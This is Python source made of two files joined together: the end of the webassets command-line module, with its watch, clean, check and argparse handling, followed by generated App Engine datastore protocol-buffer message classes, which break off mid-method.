                    try:
                        bundle.build(force=True)
                        built.append(bundle)
                    except BuildError as e:
                        print("")
                        print("Failed: %s" % e)
                    else:
                        print("done")

                if len(built):
                    self.event_handlers['post_build']()

                # A custom loop callback may stop the watcher by returning
                # a truthy value; the default just sleeps (returns None).
                do_end = loop() if loop else time.sleep(0.1)
                if do_end:
                    break
        except KeyboardInterrupt:
            pass

    def check_for_changes(self, mtimes):
        """Return the set of bundles whose watched files have changed.

        ``mtimes`` maps filename -> last seen mtime; it is updated in
        place at the end, so subsequent calls only report new changes.
        """
        # Do not update original mtimes dict right away, so that we detect
        # all bundle changes if a file is in multiple bundles.
        _new_mtimes = mtimes.copy()

        changed_bundles = set()
        # TODO: An optimization was lost here, skipping a bundle once
        # a single file has been found to have changed. Bring back.
        for filename, bundles_to_update in self.yield_files_to_watch():
            stat = os.stat(filename)
            mtime = stat.st_mtime
            if sys.platform == "win32":
                mtime -= stat.st_ctime

            if mtimes.get(filename, mtime) != mtime:
                if callable(bundles_to_update):
                    # Hook for when file has changed
                    try:
                        bundles_to_update = bundles_to_update()
                    except EnvironmentError:
                        # EnvironmentError is what the hooks is allowed to
                        # raise for a temporary problem, like an invalid config
                        import traceback
                        traceback.print_exc()
                        # Don't update anything, wait for another change
                        bundles_to_update = set()

                if bundles_to_update is True:
                    # Indicates all bundles should be rebuilt for the change
                    bundles_to_update = set(self.environment)
                changed_bundles |= bundles_to_update
            # Record the new mtime exactly once per file.  (A previous
            # version also assigned it redundantly inside the changed
            # branch above.)
            _new_mtimes[filename] = mtime

        mtimes.update(_new_mtimes)
        return changed_bundles

    def yield_files_to_watch(self):
        """Yield (filename, bundle-set) pairs for every watched source file."""
        for bundle in self.environment:
            for filename in get_all_bundle_files(bundle):
                yield filename, set([bundle])


class CleanCommand(Command):
    """Command that removes all generated output files and the cache."""

    def __call__(self):
        """Delete generated assets.
        """
        self.log.info('Cleaning generated assets...')
        for bundle in self.environment:
            if bundle.output:
                target = bundle.resolve_output(self.environment)
                if os.path.exists(target):
                    os.unlink(target)
                    self.log.info("Deleted asset: %s" % bundle.output)
        cache = self.environment.cache
        if isinstance(cache, FilesystemCache):
            # Filesystem caches can simply be wiped off disk.
            shutil.rmtree(cache.directory)


class CheckCommand(Command):
    """Command that reports, via exit status, whether assets are stale."""

    def __call__(self):
        """Check to see if assets need to be rebuilt.

        A non-zero exit status will be returned if any of the input files are
        newer (based on mtime) than their output file. This is intended to be
        used in pre-commit hooks.
        """
        outdated = False
        updater = self.environment.updater
        if not updater:
            # Fall back to the timestamp-based updater when the
            # environment does not configure one.
            self.log.debug('no updater configured, using TimestampUpdater')
            updater = TimestampUpdater()
        for bundle in self.environment:
            self.log.info('Checking asset: %s', bundle.output)
            if updater.needs_rebuild(bundle, self.environment):
                self.log.info('  needs update')
                outdated = True
        if outdated:
            sys.exit(-1)


class CommandLineEnvironment(object):
    """Implements the core functionality for a command line frontend to
    ``webassets``, abstracted in a way to allow frameworks to integrate the
    functionality into their own tools, for example, as a Django management
    command, or a command for ``Flask-Script``.
    """

    def __init__(self, env, log, post_build=None, commands=None):
        self.environment = env
        self.log = log
        # Event hooks; the default post_build handler is a no-op that
        # reports success.
        self.event_handlers = dict(post_build=lambda: True)
        if callable(post_build):
            self.event_handlers['post_build'] = post_build

        # Build the command table: defaults overlaid with caller overrides,
        # then instantiate each command.
        command_def = dict(self.DefaultCommands)
        command_def.update(commands or {})
        self.commands = {}
        for cmd_name, spec in command_def.items():
            if not spec:
                # A falsy entry disables the command entirely.
                continue
            if not isinstance(spec, (list, tuple)):
                # Bare class given; normalize to (class, args, kwargs).
                spec = [spec, (), {}]
            command_class, init_args, init_kwargs = spec[0], spec[1], spec[2]
            self.commands[cmd_name] = command_class(
                self, *init_args, **init_kwargs)

    def __getattr__(self, item):
        # Allow method-like access to commands.
        try:
            return self.commands[item]
        except KeyError:
            raise AttributeError(item)

    def invoke(self, command, args):
        """Invoke ``command``, or throw a CommandError.

        This is essentially a simple validation mechanism. Feel free
        to call the individual command methods manually.
        """
        try:
            handler = self.commands[command]
        except KeyError as e:
            raise CommandError('unknown command: %s' % e)
        return handler(**args)

    # List of commands installed
    DefaultCommands = {
        'build': BuildCommand,
        'watch': WatchCommand,
        'clean': CleanCommand,
        'check': CheckCommand
    }


class GenericArgparseImplementation(object):
    """Generic command line utility to interact with an webassets environment.

    This is effectively a reference implementation of a command line utility
    based on the ``CommandLineEnvironment`` class. Implementers may find it
    feasible to simple base their own command line utility on this, rather than
    implementing something custom on top of ``CommandLineEnvironment``. In
    fact, if that is possible, you are encouraged to do so for greater
    consistency across implementations.
    """

    class WatchCommand(WatchCommand):
        """Extended watch command that also looks at the config file itself."""

        def __init__(self, cmd_env, argparse_ns):
            # Keep the parsed argparse namespace around so that
            # yield_files_to_watch() can find the config file path.
            WatchCommand.__init__(self, cmd_env)
            self.ns = argparse_ns

        def yield_files_to_watch(self):
            # Watch everything the base watch command watches ...
            for result in WatchCommand.yield_files_to_watch(self):
                yield result
            # If the config changes, rebuild all bundles
            if getattr(self.ns, 'config', None):
                # A callable second element acts as an on-change hook for
                # the watch loop rather than a set of bundles.
                yield self.ns.config, self.reload_config

        def reload_config(self):
            """Re-read the environment from the YAML config file.

            Any failure is wrapped in ``EnvironmentError``, which the watch
            loop treats as a temporary problem (e.g. a half-saved, invalid
            config). Returning True signals that all bundles should be
            rebuilt.
            """
            try:
                self.cmd.environment = YAMLLoader(self.ns.config).load_environment()
            except Exception as e:
                raise EnvironmentError(e)
            return True


    def __init__(self, env=None, log=None, prog=None, no_global_options=False):
        # argparse ships with the stdlib only from Python 2.7 on; give
        # older interpreters without the backport a clear error message.
        try:
            import argparse
        except ImportError:
            raise RuntimeError(
                'The webassets command line now requires the '
                '"argparse" library on Python versions <= 2.6.')
        else:
            self.argparse = argparse
        self.env = env
        self.log = log
        self._construct_parser(prog, no_global_options)

    def _construct_parser(self, prog=None, no_global_options=False):
        """Build ``self.parser``: global options plus one subparser per
        command in ``CommandLineEnvironment.DefaultCommands``."""
        self.parser = parser = self.argparse.ArgumentParser(
            description="Manage assets.",
            prog=prog)

        if not no_global_options:
            # Start with the base arguments that are valid for any command.
            # XXX: Add those to the subparser?
            parser.add_argument("-v", dest="verbose", action="store_true",
                help="be verbose")
            parser.add_argument("-q", action="store_true", dest="quiet",
                help="be quiet")
            if self.env is None:
                # No environment given programmatically, so allow the user
                # to specify one on the command line -- but only one way.
                loadenv = parser.add_mutually_exclusive_group()
                loadenv.add_argument("-c", "--config", dest="config",
                    help="read environment from a YAML file")
                loadenv.add_argument("-m", "--module", dest="module",
                    help="read environment from a Python module")

        # Add subparsers.
        subparsers = parser.add_subparsers(dest='command')
        for command in CommandLineEnvironment.DefaultCommands.keys():
            command_parser = subparsers.add_parser(command)
            # Commands may contribute extra options through an optional
            # make_<command>_parser hook (only ``build`` defines one here).
            maker = getattr(self, 'make_%s_parser' % command, False)
            if maker:
                maker(command_parser)

    @staticmethod
    def make_build_parser(parser):
        """Add the ``build`` command's own options to its subparser."""
        parser.add_argument(
            'bundles', nargs='*', metavar='BUNDLE',
            help='Optional bundle names to process. If none are '
                 'specified, then all known bundles will be built.')
        parser.add_argument(
            '--output', '-o', nargs=2, action='append',
            metavar=('BUNDLE', 'FILE'),
            help='Build the given bundle, and use a custom output '
                 'file. Can be given multiple times.')
        parser.add_argument(
            '--directory', '-d',
            help='Write built files to this directory, using the '
                 'basename defined by the bundle. Will offset '
                 'the original bundle output paths on their common '
                 'prefix. Cannot be used with --output.')
        parser.add_argument(
            '--no-cache', action='store_true',
            help='Do not use a cache that might be configured.')
        parser.add_argument(
            '--manifest',
            help='Write a manifest to the given file. Also supports '
                 'the id:arg format, if you want to use a different '
                 'manifest implementation.')
        parser.add_argument(
            '--production', action='store_true',
            help='Forcably turn off debug mode for the build. This '
                 'only has an effect if debug is set to "merge".')

    def _setup_logging(self, ns):
        """Return the logger to use: the one given at construction, or a
        default ``webassets.script`` logger configured from -v/-q."""
        if self.log:
            log = self.log
        else:
            log = logging.getLogger('webassets.script')
            if not log.handlers:
                # In theory, this could run multiple times (e.g. tests)
                handler = logging.StreamHandler()
                log.addHandler(handler)
                # Note that setting the level filter at the handler level is
                # better than the logger level, since this is "our" handler,
                # we create it, for the purposes of having a default output.
                # The logger itself the user may be modifying.
                handler.setLevel(logging.DEBUG if ns.verbose else (
                    logging.WARNING if ns.quiet else logging.INFO))
        return log

    def _setup_assets_env(self, ns, log):
        """Return the assets environment: the one given at construction, or
        one loaded per the -m/-c command line options (may be None)."""
        env = self.env
        if env is None:
            # -c and -m are declared mutually exclusive by the parser.
            assert not (ns.module and ns.config)
            if ns.module:
                env = PythonLoader(ns.module).load_environment()
            if ns.config:
                env = YAMLLoader(ns.config).load_environment()
        return env

    def _setup_cmd_env(self, assets_env, log, ns):
        """Wrap the assets environment in a ``CommandLineEnvironment``,
        substituting our extended watch command."""
        return CommandLineEnvironment(assets_env, log, commands={
            'watch': (GenericArgparseImplementation.WatchCommand, (ns,), {})
        })

    def _prepare_command_args(self, ns):
        # Prepare a dict of arguments cleaned of values that are not
        # command-specific, and which the command method would not accept.
        # NOTE(review): relies on argparse's private ``_actions`` attribute
        # to identify the global (top-level parser) options.
        args = vars(ns).copy()
        for action in self.parser._actions:
            dest = action.dest
            if dest in args:
                del args[dest]
        return args

    def run_with_ns(self, ns):
        """Execute the command selected in the parsed namespace ``ns``."""
        log = self._setup_logging(ns)
        env = self._setup_assets_env(ns, log)
        if env is None:
            raise CommandError(
                "Error: No environment given or found. Maybe use -m?")
        cmd = self._setup_cmd_env(env, log, ns)

        # Run the selected command
        args = self._prepare_command_args(ns)
        return cmd.invoke(ns.command, args)

    def run_with_argv(self, argv):
        """Parse ``argv`` and run the selected command, returning argparse's
        exit status instead of exiting on a parse error."""
        try:
            ns = self.parser.parse_args(argv)
        except SystemExit as e:
            # We do not want the main() function to exit the program.
            # See run() instead.
            return e.args[0]

        return self.run_with_ns(ns)

    def main(self, argv):
        """Parse the given command line.

        The commandline is expected to NOT including what would be sys.argv[0].
        A ``CommandError`` is printed and converted into exit status 1.
        """
        try:
            return self.run_with_argv(argv)
        except CommandError as e:
            print(e)
            return 1


def main(argv, env=None):
    """Execute the generic version of the command line interface.

    You only need to work directly with ``GenericArgparseImplementation`` if
    you desire to customize things.

    If no environment is given, additional arguments will be supported to allow
    the user to specify/construct the environment on the command line.
    """
    impl = GenericArgparseImplementation(env)
    return impl.main(argv)


def run():
    """Runs the command line interface via ``main``, then exits the process
    with a proper return code."""
    status = main(sys.argv[1:]) or 0
    sys.exit(status)


# Allow this module to be executed directly as a script.
if __name__ == '__main__':
    run()

#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#



from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread

# Suppress pychecker warnings for this generated module.
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
                   unusednames=printElemNumber,debug_strs no-special"""

# Detect whether the ProtocolBuffer runtime supports message extensions;
# fall back to the plain message base class when it does not.
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
  _extension_runtime = True
  _ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
  _extension_runtime = False
  _ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage

from google.appengine.api.api_base_pb import *
import google.appengine.api.api_base_pb
from google.appengine.datastore.action_pb import *
import google.appengine.datastore.action_pb
from google.appengine.datastore.entity_pb import *
import google.appengine.datastore.entity_pb
from google.appengine.datastore.snapshot_pb import *
import google.appengine.datastore.snapshot_pb
class InternalHeader(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.InternalHeader.

  Four optional string fields. Per the App Engine ProtocolBuffer
  code-generation style, each field ``f`` stores its value in ``f_`` and
  its presence flag in ``has_f_`` (class-level defaults below).
  """
  has_requesting_app_id_ = 0
  requesting_app_id_ = ""
  has_requesting_project_id_ = 0
  requesting_project_id_ = ""
  has_requesting_version_id_ = 0
  requesting_version_id_ = ""
  has_api_settings_ = 0
  api_settings_ = ""

  def __init__(self, contents=None):
    # Optionally initialize from an already-serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  # --- Generated per-field accessors: get / set / clear / has. ---

  def requesting_app_id(self): return self.requesting_app_id_

  def set_requesting_app_id(self, x):
    self.has_requesting_app_id_ = 1
    self.requesting_app_id_ = x

  def clear_requesting_app_id(self):
    if self.has_requesting_app_id_:
      self.has_requesting_app_id_ = 0
      self.requesting_app_id_ = ""

  def has_requesting_app_id(self): return self.has_requesting_app_id_

  def requesting_project_id(self): return self.requesting_project_id_

  def set_requesting_project_id(self, x):
    self.has_requesting_project_id_ = 1
    self.requesting_project_id_ = x

  def clear_requesting_project_id(self):
    if self.has_requesting_project_id_:
      self.has_requesting_project_id_ = 0
      self.requesting_project_id_ = ""

  def has_requesting_project_id(self): return self.has_requesting_project_id_

  def requesting_version_id(self): return self.requesting_version_id_

  def set_requesting_version_id(self, x):
    self.has_requesting_version_id_ = 1
    self.requesting_version_id_ = x

  def clear_requesting_version_id(self):
    if self.has_requesting_version_id_:
      self.has_requesting_version_id_ = 0
      self.requesting_version_id_ = ""

  def has_requesting_version_id(self): return self.has_requesting_version_id_

  def api_settings(self): return self.api_settings_

  def set_api_settings(self, x):
    self.has_api_settings_ = 1
    self.api_settings_ = x

  def clear_api_settings(self):
    if self.has_api_settings_:
      self.has_api_settings_ = 0
      self.api_settings_ = ""

  def has_api_settings(self): return self.has_api_settings_


  def MergeFrom(self, x):
    """Copy every field that is present on ``x`` over our own value."""
    assert x is not self
    if (x.has_requesting_app_id()): self.set_requesting_app_id(x.requesting_app_id())
    if (x.has_requesting_project_id()): self.set_requesting_project_id(x.requesting_project_id())
    if (x.has_requesting_version_id()): self.set_requesting_version_id(x.requesting_version_id())
    if (x.has_api_settings()): self.set_api_settings(x.api_settings())

  def Equals(self, x):
    """Field-wise equality: presence flags must match, then values."""
    if x is self: return 1
    if self.has_requesting_app_id_ != x.has_requesting_app_id_: return 0
    if self.has_requesting_app_id_ and self.requesting_app_id_ != x.requesting_app_id_: return 0
    if self.has_requesting_project_id_ != x.has_requesting_project_id_: return 0
    if self.has_requesting_project_id_ and self.requesting_project_id_ != x.requesting_project_id_: return 0
    if self.has_requesting_version_id_ != x.has_requesting_version_id_: return 0
    if self.has_requesting_version_id_ and self.requesting_version_id_ != x.requesting_version_id_: return 0
    if self.has_api_settings_ != x.has_api_settings_: return 0
    if self.has_api_settings_ and self.api_settings_ != x.api_settings_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # All fields are optional, so the message is always initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    # Each present field costs 1 tag byte plus a length-prefixed string.
    n = 0
    if (self.has_requesting_app_id_): n += 1 + self.lengthString(len(self.requesting_app_id_))
    if (self.has_requesting_project_id_): n += 1 + self.lengthString(len(self.requesting_project_id_))
    if (self.has_requesting_version_id_): n += 1 + self.lengthString(len(self.requesting_version_id_))
    if (self.has_api_settings_): n += 1 + self.lengthString(len(self.api_settings_))
    return n

  def ByteSizePartial(self):
    # Identical to ByteSize: there are no required fields to exclude.
    n = 0
    if (self.has_requesting_app_id_): n += 1 + self.lengthString(len(self.requesting_app_id_))
    if (self.has_requesting_project_id_): n += 1 + self.lengthString(len(self.requesting_project_id_))
    if (self.has_requesting_version_id_): n += 1 + self.lengthString(len(self.requesting_version_id_))
    if (self.has_api_settings_): n += 1 + self.lengthString(len(self.api_settings_))
    return n

  def Clear(self):
    self.clear_requesting_app_id()
    self.clear_requesting_project_id()
    self.clear_requesting_version_id()
    self.clear_api_settings()

  def OutputUnchecked(self, out):
    # Serialize in field-number order 2, 3, 4, 5 (wire tags 18, 26, 34, 42).
    if (self.has_requesting_app_id_):
      out.putVarInt32(18)
      out.putPrefixedString(self.requesting_app_id_)
    if (self.has_api_settings_):
      out.putVarInt32(26)
      out.putPrefixedString(self.api_settings_)
    if (self.has_requesting_project_id_):
      out.putVarInt32(34)
      out.putPrefixedString(self.requesting_project_id_)
    if (self.has_requesting_version_id_):
      out.putVarInt32(42)
      out.putPrefixedString(self.requesting_version_id_)

  def OutputPartial(self, out):
    # Same as OutputUnchecked: every field here is optional.
    if (self.has_requesting_app_id_):
      out.putVarInt32(18)
      out.putPrefixedString(self.requesting_app_id_)
    if (self.has_api_settings_):
      out.putVarInt32(26)
      out.putPrefixedString(self.api_settings_)
    if (self.has_requesting_project_id_):
      out.putVarInt32(34)
      out.putPrefixedString(self.requesting_project_id_)
    if (self.has_requesting_version_id_):
      out.putVarInt32(42)
      out.putPrefixedString(self.requesting_version_id_)

  def TryMerge(self, d):
    # Decode until the buffer is exhausted; unknown tags are skipped,
    # tag 0 indicates corrupt data.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 18:
        self.set_requesting_app_id(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_api_settings(d.getPrefixedString())
        continue
      if tt == 34:
        self.set_requesting_project_id(d.getPrefixedString())
        continue
      if tt == 42:
        self.set_requesting_version_id(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render a human-readable text form showing only the present fields."""
    res=""
    if self.has_requesting_app_id_: res+=prefix+("requesting_app_id: %s\n" % self.DebugFormatString(self.requesting_app_id_))
    if self.has_requesting_project_id_: res+=prefix+("requesting_project_id: %s\n" % self.DebugFormatString(self.requesting_project_id_))
    if self.has_requesting_version_id_: res+=prefix+("requesting_version_id: %s\n" % self.DebugFormatString(self.requesting_version_id_))
    if self.has_api_settings_: res+=prefix+("api_settings: %s\n" % self.DebugFormatString(self.api_settings_))
    return res


  # Invoked at class-definition time (still a plain function here, hence
  # no self/cls parameter) to build the dense tag lookup tables below.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field numbers.
  krequesting_app_id = 2
  krequesting_project_id = 4
  krequesting_version_id = 5
  kapi_settings = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    2: "requesting_app_id",
    3: "api_settings",
    4: "requesting_project_id",
    5: "requesting_version_id",
  }, 5)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.InternalHeader'
class Transaction(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.Transaction.

  Fields: optional ``header`` (InternalHeader submessage, lazily created),
  required fixed64 ``handle``, required string ``app``, and optional bool
  ``mark_changes``. Each field ``f`` stores its value in ``f_`` and its
  presence flag in ``has_f_``.
  """
  has_header_ = 0
  header_ = None
  has_handle_ = 0
  handle_ = 0
  has_app_ = 0
  app_ = ""
  has_mark_changes_ = 0
  mark_changes_ = 0

  def __init__(self, contents=None):
    # Lock guarding the lazy creation of the header_ submessage.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Lazily create the submessage; re-check under the lock so two
    # concurrent callers cannot both allocate one.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    # Keep the allocated submessage around (just cleared) to avoid
    # re-allocating it on the next access.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def handle(self): return self.handle_

  def set_handle(self, x):
    self.has_handle_ = 1
    self.handle_ = x

  def clear_handle(self):
    if self.has_handle_:
      self.has_handle_ = 0
      self.handle_ = 0

  def has_handle(self): return self.has_handle_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_


  def MergeFrom(self, x):
    """Copy every field that is present on ``x`` over our own value."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_handle()): self.set_handle(x.handle())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())

  def Equals(self, x):
    """Field-wise equality: presence flags must match, then values."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_handle_ != x.has_handle_: return 0
    if self.has_handle_ and self.handle_ != x.handle_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # handle and app are required; header must itself be initialized if set.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_handle_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: handle not set.')
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    return initialized

  def ByteSize(self):
    # +10 = 9 bytes for the fixed64 handle (1 tag + 8 data) plus the
    # 1-byte tag of the required app string (its length is added above).
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_mark_changes_): n += 2
    return n + 10

  def ByteSizePartial(self):
    # Like ByteSize, but required fields are only counted when present.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_handle_):
      n += 9
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_mark_changes_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_handle()
    self.clear_app()
    self.clear_mark_changes()

  def OutputUnchecked(self, out):
    # Wire tags: handle=9 (fixed64), app=18, mark_changes=24, header=34.
    out.putVarInt32(9)
    out.put64(self.handle_)
    out.putVarInt32(18)
    out.putPrefixedString(self.app_)
    if (self.has_mark_changes_):
      out.putVarInt32(24)
      out.putBoolean(self.mark_changes_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same as OutputUnchecked, but required fields are skipped when unset.
    if (self.has_handle_):
      out.putVarInt32(9)
      out.put64(self.handle_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)
    if (self.has_mark_changes_):
      out.putVarInt32(24)
      out.putBoolean(self.mark_changes_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode until the buffer is exhausted; unknown tags are skipped,
    # tag 0 indicates corrupt data.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 9:
        self.set_handle(d.get64())
        continue
      if tt == 18:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 24:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 34:
        # Length-prefixed submessage: decode it from a bounded sub-decoder.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render a human-readable text form showing only the present fields."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_handle_: res+=prefix+("handle: %s\n" % self.DebugFormatFixed64(self.handle_))
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    return res


  # Invoked at class-definition time (still a plain function here, hence
  # no self/cls parameter) to build the dense tag lookup tables below.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field numbers.
  kheader = 4
  khandle = 1
  kapp = 2
  kmark_changes = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "handle",
    2: "app",
    3: "mark_changes",
    4: "header",
  }, 4)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.DOUBLE,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
  }, 4, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Transaction'
class Query_Filter(ProtocolBuffer.ProtocolMessage):
  """Generated group class: the ``filter`` group of a datastore Query.

  Holds a required ``op`` (an Operator enum value) and a repeated
  ``property`` submessage list.
  """


  # Operator enum values.
  LESS_THAN    =    1
  LESS_THAN_OR_EQUAL =    2
  GREATER_THAN =    3
  GREATER_THAN_OR_EQUAL =    4
  EQUAL        =    5
  IN           =    6
  EXISTS       =    7

  _Operator_NAMES = {
    1: "LESS_THAN",
    2: "LESS_THAN_OR_EQUAL",
    3: "GREATER_THAN",
    4: "GREATER_THAN_OR_EQUAL",
    5: "EQUAL",
    6: "IN",
    7: "EXISTS",
  }

  # classmethod applied explicitly (pre-decorator-syntax generated code).
  def Operator_Name(cls, x): return cls._Operator_NAMES.get(x, "")
  Operator_Name = classmethod(Operator_Name)

  has_op_ = 0
  op_ = 0

  def __init__(self, contents=None):
    # Repeated fields must live on the instance, not the class.
    self.property_ = []
    if contents is not None: self.MergeFromString(contents)

  def op(self): return self.op_

  def set_op(self, x):
    self.has_op_ = 1
    self.op_ = x

  def clear_op(self):
    if self.has_op_:
      self.has_op_ = 0
      self.op_ = 0

  def has_op(self): return self.has_op_

  def property_size(self): return len(self.property_)
  def property_list(self): return self.property_

  def property(self, i):
    return self.property_[i]

  def mutable_property(self, i):
    return self.property_[i]

  def add_property(self):
    # Append a fresh Property submessage and return it for filling in.
    x = Property()
    self.property_.append(x)
    return x

  def clear_property(self):
    self.property_ = []

  def MergeFrom(self, x):
    """Copy ``op`` if set and append copies of all of x's properties."""
    assert x is not self
    if (x.has_op()): self.set_op(x.op())
    for i in xrange(x.property_size()): self.add_property().CopyFrom(x.property(i))

  def Equals(self, x):
    """Field-wise equality, including element-wise property comparison."""
    if x is self: return 1
    if self.has_op_ != x.has_op_: return 0
    if self.has_op_ and self.op_ != x.op_: return 0
    if len(self.property_) != len(x.property_): return 0
    for e1, e2 in zip(self.property_, x.property_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # op is required; every property submessage must also be initialized.
    initialized = 1
    if (not self.has_op_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: op not set.')
    for p in self.property_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    # +1 is the tag byte of the required op field.
    n = 0
    n += self.lengthVarInt64(self.op_)
    n += 1 * len(self.property_)
    for i in xrange(len(self.property_)): n += self.lengthString(self.property_[i].ByteSize())
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize, but op is only counted when present.
    n = 0
    if (self.has_op_):
      n += 1
      n += self.lengthVarInt64(self.op_)
    n += 1 * len(self.property_)
    for i in xrange(len(self.property_)): n += self.lengthString(self.property_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_op()
    self.clear_property()

  def OutputUnchecked(self, out):
    # Wire tags: op=48 (varint), property=114 (length-prefixed message).
    out.putVarInt32(48)
    out.putVarInt32(self.op_)
    for i in xrange(len(self.property_)):
      out.putVarInt32(114)
      out.putVarInt32(self.property_[i].ByteSize())
      self.property_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same as OutputUnchecked, but op is skipped when unset.
    if (self.has_op_):
      out.putVarInt32(48)
      out.putVarInt32(self.op_)
    for i in xrange(len(self.property_)):
      out.putVarInt32(114)
      out.putVarInt32(self.property_[i].ByteSizePartial())
      self.property_[i].OutputPartial(out)

  def TryMerge(self, d):
    # Decode until the group terminator (tag 36); unknown tags are
    # skipped, tag 0 indicates corrupt data.
    while 1:
      tt = d.getVarInt32()
      if tt == 36: break
      if tt == 48:
        self.set_op(d.getVarInt32())
        continue
      if tt == 114:
        # Length-prefixed submessage: decode via a bounded sub-decoder.
        length = d.getVarInt32()
